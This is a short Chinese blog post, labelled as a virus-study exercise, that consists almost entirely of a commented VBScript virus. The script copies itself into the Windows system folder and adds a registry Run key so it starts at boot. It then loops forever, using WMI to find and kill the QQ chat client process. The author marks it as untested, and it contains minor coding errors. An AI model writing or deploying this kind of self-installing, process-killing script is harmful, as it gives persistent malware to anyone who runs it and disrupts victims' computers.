CSDN博客

img hefenghhhh

vbs 病毒学习二 (未测试)

发表于2008/10/1 19:16:00  366人阅读

'VIRUS CODE STARTS HERE

'-----------------------------------------------------

'容错控制,防止发生异常抛出而导致程序崩溃

On Error Resume Next

'创建文件系统对象

Set fso=CreateObject("Scripting.FileSystemObject")

'获得系统文件夹

Set sysdir=fso.GetSpecialFolder(1)

Set filespec=sysdir&"/hlx0Q.vbs"

'创建Windows脚本壳对象

Set ws=CreateObject("Wscript.Shell")

'将病毒文件拷贝到系统文件夹下并改名

fso.GetFile(WScript.ScriptFullName).Copy(filespec)

'写注册表,设置启动时自动加载项

ws.RegWrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Run/hlx0Q","hlx0Q.vbs"

'获得QQ服务进程,您可以通过按“Ctrl+Alt+Del”查看进程列表,获得进程映像名称

do

    '表示本地主机

    strComputer = "."

    '获得进程名

    strWQL="Select * from Win32_Process Where Name = 'qq.exe'"

    '获得VMI对象

    Set objWMIService = GetObject("winmgmts:" _

    & "{impersonationLevel=impersonate}!//" & strComputer & "/root/cimv2")

    Set colProcessList = objWMIService.ExecQuery(strWQL)

    '在进程列表中枚举目标进程,一旦发现便中断它运行

    For Each objProcess in colProcessList

        objProcess.Terminate()

    Next

loop

'注销对象

Set fso=Nothing

Set sysdir=Nothing

Set ws=Nothing

Set filename=Nothing

Set objWMIService=Nothing

Set objProcess=Nothing

阅读全文
0 0

相关文章推荐

img
取 消
img